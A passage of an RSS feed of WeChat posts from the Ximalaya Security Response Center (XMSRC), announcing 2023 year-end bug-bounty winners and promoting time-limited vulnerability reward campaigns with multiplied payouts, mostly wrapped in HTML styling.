</span></p></section><section style="line-height: 1.8em;text-align: left;margin: 0px;text-indent: 0em;"><span style="font-size: 12px;"><strong><span style="color: rgb(106, 106, 106);letter-spacing: 0.578px;text-decoration: none solid rgb(106, 106, 106);">注意：</span></strong></span></section><section style="line-height: 1.8em;text-align: left;margin: 0px;text-indent: 0em;"><span style="color: rgb(106, 106, 106);letter-spacing: 0.578px;text-decoration: none solid rgb(106, 106, 106);font-size: 12px;">1、年排行榜中，贡献值 &gt;= 50</span></section><section style="line-height: 1.8em;text-align: left;margin: 0px;text-indent: 0em;"><span style="color: rgb(106, 106, 106);letter-spacing: 0.578px;text-decoration: none solid rgb(106, 106, 106);font-size: 12px;">2、若贡献值大于50的不足5人，则从上而下开始分配</span></section><section style="line-height: 1.8em;text-align: left;margin: 0px;text-indent: 0em;"><span style="color: rgb(106, 106, 106);letter-spacing: 0.578px;text-decoration: none solid rgb(106, 106, 106);font-size: 12px;">例如：两人满足条件，则第一人获得5000，第二人获得2000，剩余空置。                      </span></section></section></section></section><section style="font-size: 16px;color: #e42219;text-align: center;"><strong data-brushtype="text"></strong></section><section style="font-size: 16px;color: #e42219;text-align: center;"><br/></section><section style="font-size: 16px;color: #e42219;text-align: center;"><span style="text-align: left;color: rgba(0, 0, 0, 0.9);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">根据以往XMSRC的年终奖励规则，</span></section><section style="font-size: 16px;color: #e42219;text-align: center;"><span style="text-align: left;color: rgba(0, 0, 0, 0.9);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">共有以下四位师傅满足条件<br/></span></section><section style="text-align: center;">让我们恭喜他们！！</section><section style="text-align: center;"><br/></section><section style="letter-spacing: 0.578px;text-wrap: wrap;text-align: center;line-height: 1.6em;"><span style="color: rgb(217, 33, 66);"><strong>Waichung：年终奖励5000元</strong></span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></section><section style="letter-spacing: 0.578px;text-wrap: wrap;text-align: center;line-height: 1.6em;"><span style="color: rgb(217, 33, 66);"></span></section><section style="letter-spacing: 0.578px;text-wrap: wrap;text-align: center;line-height: 1.6em;"><span style="color: rgb(217, 33, 66);"><strong>开元米粉实力代购：年终奖励2000元</strong></span></section><section style="letter-spacing: 0.578px;text-wrap: wrap;text-align: center;line-height: 1.6em;"><span style="color: rgb(217, 33, 66);"></span></section><section style="letter-spacing: 0.578px;text-wrap: wrap;text-align: center;line-height: 1.6em;"><span style="color: rgb(217, 33, 66);"><strong>那年微风：年终奖励1000元</strong></span></section><section style="letter-spacing: 0.578px;text-wrap: wrap;text-align: center;line-height: 1.6em;"><span style="color: rgb(217, 33, 66);"></span></section><section style="letter-spacing: 0.578px;text-wrap: wrap;line-height: 1.6em;text-align: center;"><span style="color: rgb(217, 33, 66);"><strong>鸣蜩十四：年终奖励1000元</strong></span></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000210" data-ratio="0.3346613545816733" data-s="300,640" style="" data-type="png" data-w="1004" src="https://wechat2rss.xlab.app/img-proxy/?k=367784f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibib4xicr5OA0zkmzHHAzuJutzQXZOa5oYnSKKwyMsSPBKRWn2aecpwlBdBhjq6eXLoM9zictAmf2Guvg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;"><strong style="color: rgb(217, 33, 66);letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);"><br/></strong></p><p style="text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: left;">*</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;text-align: left;letter-spacing: 0.034em;font-size: 15px;">年终奖励会在三月初发放，请师傅们及时联系审核兑奖哦～～</span><br/></p></section></section></section></section></section><section style="line-height: 1.6em;text-align: center;"><span style="text-align: left;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-size: 15px;"></span></section><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-imgfileid="100000204" data-ratio="1" data-s="300,640" style="width: 141px;height: 141px;" data-type="gif" data-w="240" src="https://wechat2rss.xlab.app/img-proxy/?k=a6fdbc90&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FbNibSwNU98ibib4xicr5OA0zkmzHHAzuJutzrXfbmC0YRpkq6fib78hN4qrKP7BKYeu1vrqlBI2nxiawZbBwU4bmSJnQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p><section style="line-height: 1.6em;text-align: center;"><span style="text-align: left;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></section><section style="text-align: center;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">再次感谢各位白帽子对喜马拉雅安全的关注与支持！</span><br/></section><section style="text-align: center;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">2024再接再厉！！</span></section><section style="text-align: center;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">XMSRC在这里给师傅们</span></section><section style="text-align: center;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">拜年啦～～</span></section><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-imgfileid="100000201" data-ratio="1" data-s="300,640" style="width: 170px;height: 170px;" data-type="gif" data-w="240" src="https://wechat2rss.xlab.app/img-proxy/?k=7fac928c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FbNibSwNU98ibib4xicr5OA0zkmzHHAzuJutzzoeyWoItIIKs4D5UOp7A4Cz9qHtOqHznBjOSQTAMSbaicIhGIYnz7cw%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p><section style="text-align: center;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></section><section style="text-align: center;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"><br/></span></section><section class="mp_profile_iframe_wrp"><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-id="MzI3Mzk4MDQ5NQ==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/bNibSwNU98ib9JD0f8Iq5cXAbKpViaicStFMXZXbHAricLXbhWGNrPF0h4VwMGk4x8zzd9GNCIicqCvCiakK6468pKibbg/0?wx_fmt=png" data-nickname="喜马拉雅安全响应平台" data-alias="XimalayaSecurity" data-signature="喜马拉雅安全响应中心" data-from="0" data-is_biz_ban="0"></mp-common-profile></section><section style="line-height: 1.6em;"><section style="display: none;line-height: 1.5em;"><br/></section></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483859">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=25eaeb2c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247483859%26idx%3D1%26sn%3D70ce17d4a88a361c49d54219f7c459e7%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 08 Feb 2024 19:18:00 +0800</pubDate>
    </item>
    <item>
      <title>升级奖励规则还翻1.5倍？尊嘟假嘟</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247483821&amp;idx=1&amp;sn=53c9295bc78e7c0e756f52d870ba7a8f</link>
      <description>新规则奖励升级，叠加1.5倍奖励活动，单个漏洞最高至4500元！</description>
      <content:encoded><![CDATA[<p>
<span>XMSRC</span> <span>2023-11-15 17:12</span> <span style="display: inline-block;">上海</span>
</p>

<p>新规则奖励升级，叠加1.5倍奖励活动，单个漏洞最高至4500元！</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=c4e5ef35&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ib9LO9WguNtfSk41U10b3IpEDX6fqSEpV91wHaiaZqM53WiaJpvTurhaWI3LTPicSREQzVVtXqFPsAhhg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><img class="rich_pages wxw-img" data-ratio="2.35" data-s="300,640" style="" data-type="png" data-w="800" src="https://wechat2rss.xlab.app/img-proxy/?k=6040ca58&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibibe1uqqGHVEMicWOM9C8GaibKl5gvRlGlibXDBvcr4bAIDvZOXQNMcK51seyLNyeqJODDufca80Z4ZwQ%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-ratio="2.46125" data-s="300,640" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;" data-type="png" data-w="800" src="https://wechat2rss.xlab.app/img-proxy/?k=f8701111&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibibe1uqqGHVEMicWOM9C8GaibKLBwZSC2RQic9uulgOkXDOK6DXwSNZfia1Avt0wAvrhIhiaWKHvPJ1TXibw%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-ratio="2.13625" data-s="300,640" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;" data-type="png" data-w="800" src="https://wechat2rss.xlab.app/img-proxy/?k=15b280cb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibibe1uqqGHVEMicWOM9C8GaibK0ic9kDZftexVvzpUAAayla5BbqQSk3RrOD1NrUEW0ALFx59E63XuQaQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483821">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7281d27e&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247483821%26idx%3D1%26sn%3D53c9295bc78e7c0e756f52d870ba7a8f%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 15 Nov 2023 17:12:00 +0800</pubDate>
    </item>
    <item>
      <title>「七夕专项众测」我们在一起挖～</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247483805&amp;idx=1&amp;sn=1eeef9583d287fa161aeed727a8236e7</link>
      <description>​七夕就要到了，师傅们快来和喜马君一起过节挖！限时一月，最高双倍奖励等你来拿～</description>
      <content:encoded><![CDATA[<p>
<span>XMSRC</span> <span>2023-08-18 17:47</span> <span style="display: inline-block;">上海</span>
</p>

<p>​七夕就要到了，师傅们快来和喜马君一起过节挖！限时一月，最高双倍奖励等你来拿～</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=b8028f93&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ib9d7XLjCIhWmI7Fibw0kBNBvzAxdeEC70NnSQoIkgN1RrmADk3KgbQfzWo3SlnUv9HmQbk1M7fXLbA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="2.74" data-s="300,640" style="" data-type="png" data-w="800" src="https://wechat2rss.xlab.app/img-proxy/?k=19f13457&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ib9d7XLjCIhWmI7Fibw0kBNBvR9pImJY9q80gnlvJAgptic9H8RDbz6CuZ2j5IFpSFtI6Ws6QP9vqUYA%2F640%3Fwx_fmt%3Dpng"/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483805">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=f3651ce2&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247483805%26idx%3D1%26sn%3D1eeef9583d287fa161aeed727a8236e7%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 18 Aug 2023 17:47:00 +0800</pubDate>
    </item>
    <item>
      <title>1.5倍奖励｜XMSRC邀你一起踏春啦！</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247483790&amp;idx=1&amp;sn=38cdfe0582f6de07146be0a6239c08fb</link>
      <description>【春日活动】限时1个月，赢1.5倍奖励！</description>
      <content:encoded><![CDATA[<p>
<span>Qw1k</span> <span>2023-04-04 15:53</span> <span style="display: inline-block;">上海</span>
</p>

<p>【春日活动】限时1个月，赢1.5倍奖励！</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=c2c84653&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ibibm2ic1mkTXibxanl0TYjSYWAnqg3fml0ibcTPMWjJhMicYXPFAv6iavOMibpTHLQy0xl3cdwDVxBMfssSQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="background-color: rgb(248, 248, 248);box-sizing: border-box;font-size: 16px;"><p style="white-space: normal;box-sizing: border-box;" powered-by="xiumi.us"><br/></p><section style="text-align: center;justify-content: center;display: flex;flex-flow: row nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 80%;vertical-align: top;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><section style="display: flex;width: 100%;flex-flow: column nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="z-index: 2;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row nowrap;margin-bottom: -40px;box-sizing: border-box;"><section style="display: inline-block;vertical-align: top;width: 50%;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><section style="text-align: center;transform: translate3d(3px, 0px, 0px);-webkit-transform: translate3d(3px, 0px, 0px);-moz-transform: translate3d(3px, 0px, 0px);-o-transform: translate3d(3px, 0px, 0px);box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 6px;height: 30px;vertical-align: top;overflow: hidden;background-color: rgb(77, 105, 64);border-radius: 20px;box-sizing: border-box;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: top;width: 50%;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><section style="text-align: center;transform: translate3d(-1px, 0px, 0px);box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 6px;height: 30px;vertical-align: top;overflow: hidden;background-color: rgb(77, 105, 64);border-radius: 20px;box-sizing: border-box;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section></section><section style="margin-top: 20px;margin-bottom: 20px;padding-left: 5px;padding-right: 5px;box-sizing: border-box;" powered-by="xiumi.us"><section style="transform: rotate(3deg);-webkit-transform: rotate(3deg);-moz-transform: rotate(3deg);-o-transform: rotate(3deg);box-sizing: border-box;"><section style="border-width: 1px;border-style: solid;border-color: transparent;background-color: rgb(218, 226, 174);box-sizing: border-box;"><section style="transform: rotate(-3deg);-webkit-transform: rotate(-3deg);-moz-transform: rotate(-3deg);-o-transform: rotate(-3deg);box-sizing: border-box;"><section style="border-width: 0px;border-style: solid;border-color: rgb(102, 165, 219);width: 100%;background-color: rgb(255, 255, 255);padding-top: 5px;box-sizing: border-box;"><section style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row nowrap;margin-top: -5px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;vertical-align: top;width: 50%;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 15px;height: 15px;vertical-align: top;overflow: hidden;background-color: rgb(254, 255, 255);border-radius: 20px;box-shadow: rgb(228, 228, 228) 2px 2px 0px 0px;box-sizing: border-box;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;vertical-align: top;width: 50%;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 15px;height: 15px;vertical-align: top;overflow: hidden;background-color: rgb(254, 255, 255);border-radius: 20px;box-shadow: rgb(228, 228, 228) 2px 2px 0px 0px;box-sizing: border-box;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section><section style="margin-bottom: 5px;box-sizing: border-box;" powered-by="xiumi.us"><section style="font-size: 14px;color: rgb(77, 105, 64);box-sizing: border-box;"><p style="box-sizing: border-box;"><br style="box-sizing: border-box;"/></p></section></section><section style="margin-bottom: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="font-size: 32px;color: rgb(77, 105, 64);line-height: 1.3;font-family: BENMOJingyuan3D;box-sizing: border-box;"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">XMSRC</strong></p><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">邀你一起踏春啦～</strong></p></section></section><section style="justify-content: center;display: flex;flex-flow: row nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 80%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><section style="justify-content: center;display: flex;flex-flow: row nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;border-top: 1px dashed rgb(77, 105, 64);border-bottom: 1px solid rgb(77, 105, 64);align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><section style="margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="font-size: 12px;color: rgb(77, 105, 64);line-height: 2;letter-spacing: 1px;box-sizing: border-box;"><p style="box-sizing: border-box;">_XIMALAYA SECURITY_</p></section></section></section></section></section></section><section style="text-align: justify;box-sizing: border-box;" powered-by="xiumi.us"><p style="white-space: normal;box-sizing: border-box;"><br style="box-sizing: border-box;"/></p></section></section></section></section></section></section></section></section><p style="white-space: normal;box-sizing: border-box;" powered-by="xiumi.us"><br style="box-sizing: border-box;"/></p><section style="text-align: right;justify-content: flex-end;display: flex;flex-flow: row nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;vertical-align: top;width: 90%;align-self: stretch;flex: 0 0 auto;background-color: rgba(218, 226, 174, 0.15);border-right: 1px solid rgb(77, 105, 64);height: auto;box-sizing: border-box;"><section style="text-align: left;justify-content: center;display: flex;flex-flow: row nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;vertical-align: top;width: 5%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><section style="margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;" powered-by="xiumi.us"><section style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 18px;height: auto;box-sizing: border-box;"><img data-ratio="0.9375" style="vertical-align: middle;width: 100%;height: 100%;box-sizing: border-box;" data-type="svg" data-w="160" src="https://wechat2rss.xlab.app/img-proxy/?k=0cacbae0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_svg%2FOibRNdtlJdkFC1u6l0v4pDJQs7UPlib4xAZEsVZ4XVISM8oN8175XhJhnZpszZVWI4fdR2TEV6XagKibdJYPpico9a0UXfkEPW3R%2F640%3Fwx_fmt%3Dsvg"/></section></section></section><section style="display: inline-block;vertical-align: top;width: 90%;align-self: flex-start;flex: 0 0 auto;height: auto;padding-top: 20px;padding-right: 8px;padding-bottom: 20px;box-sizing: border-box;"><section style="text-align: justify;font-size: 15px;color: rgba(62, 62, 62, 0.82);letter-spacing: 1px;line-height: 2;box-sizing: border-box;" powered-by="xiumi.us"><p style="text-indent: 2em;white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;text-indent: 2em;box-sizing: border-box;"><br/></span></p><p style="text-indent: 2em;white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;text-indent: 2em;box-sizing: border-box;">正值踏春之际</span></p><p style="text-indent: 2em;white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;text-indent: 2em;box-sizing: border-box;">我们特别发起漏洞奖励活动<br/></span></p><p style="text-indent: 2em;white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;text-indent: 2em;box-sizing: border-box;">回馈师傅们的辛勤付出<br/></span></p><p style="text-indent: 2em;white-space: normal;box-sizing: border-box;"><span style="font-size: 14px;text-indent: 2em;box-sizing: border-box;">感谢各位对喜马安全的支持和关注～</span></p><p style="text-indent: 2em;white-space: normal;box-sizing: border-box;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;text-indent: 2em;">快喊上你的小伙伴一起来挑战奖金库吧！</span></p></section></section></section></section><section style="display: inline-block;vertical-align: top;width: auto;align-self: stretch;flex: 0 0 auto;margin-left: 3px;border-left: 3px solid rgb(77, 105, 64);min-width: 5%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: justify;box-sizing: border-box;" powered-by="xiumi.us"><p style="white-space: normal;box-sizing: border-box;"><br style="box-sizing: border-box;"/></p></section></section></section><p style="white-space: normal;box-sizing: border-box;" powered-by="xiumi.us"><br style="box-sizing: border-box;"/></p><section style="text-align: center;justify-content: center;display: flex;flex-flow: row nowrap;margin-top: 15px;margin-bottom: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: auto;vertical-align: top;align-self: flex-start;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;background-color: rgba(218, 226, 174, 0.15);border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);box-shadow: rgb(191, 209, 183) 3px 3px 0px 0px;box-sizing: border-box;"><section style="margin: 10px 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="font-size: 18px;color: rgb(255, 255, 254);text-shadow: rgb(77, 105, 64) 1px 1px 0px, rgb(77, 105, 64) 1px -1px 0px, rgb(77, 105, 64) -1px 1px 0px, rgb(77, 105, 64) -1px -1px 0px, rgb(77, 105, 64) 0px 1.4px 0px, rgb(77, 105, 64) 0px -1.4px 0px, rgb(77, 105, 64) -1.4px 0px 0px, rgb(77, 105, 64) 1.4px 0px 0px;letter-spacing: 4px;line-height: 1;padding-right: 15px;padding-left: 15px;box-sizing: border-box;"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">活动时间</strong></p></section></section></section></section><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: flex;width: 100%;flex-flow: column nowrap;box-sizing: border-box;"><section style="z-index: 2;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: left;margin-bottom: -30px;line-height: 0;transform: translate3d(10px, 0px, 0px);box-sizing: border-box;"><section style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 40px;height: auto;box-sizing: border-box;"><img class="rich_pages wxw-img" data-ratio="1.1194029850746268" style="vertical-align: middle;width: 100%;height: 100%;box-sizing: border-box;" data-type="svg" data-w="134" src="https://wechat2rss.xlab.app/img-proxy/?k=c3ca056b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_svg%2FOibRNdtlJdkFC1u6l0v4pDJQs7UPlib4xA8Jpt3tGQl1hNbetSE0vlfPCnZ9JP1upkTQLEqaSvb7p4TibI46n8atQqiaZJhUY6eY%2F640%3Fwx_fmt%3Dsvg"/></section></section></section></section></section><section style="text-align: center;justify-content: center;display: flex;flex-flow: row nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 90%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 5px;overflow: hidden;background-color: rgba(218, 226, 174, 0.15);padding: 5px;height: auto;box-sizing: border-box;"><section style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row nowrap;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;border-style: solid;border-width: 1px;border-color: rgba(62, 62, 62, 0.82);border-radius: 5px;overflow: hidden;background-color: rgb(255, 255, 255);padding: 10px;box-sizing: border-box;"><section style="margin-top: 10px;margin-bottom: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: justify;font-size: 15px;color: rgba(62, 62, 62, 0.82);letter-spacing: 1px;line-height: 2;box-sizing: border-box;"><p style="text-align: center;white-space: normal;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">2023年4月5日 9:00</span></strong></p><p style="text-align: center;white-space: normal;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">～</span></strong></p><p style="text-align: center;white-space: normal;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="font-size: 14px;box-sizing: border-box;">2023年5月5日 21:00</span></strong></p><p style="white-space: normal;box-sizing: border-box;"><br style="box-sizing: border-box;"/></p><p style="text-align: center;white-space: normal;box-sizing: border-box;"><span style="font-size: 12px;box-sizing: border-box;">*测试时间仅限每天<strong style="box-sizing: 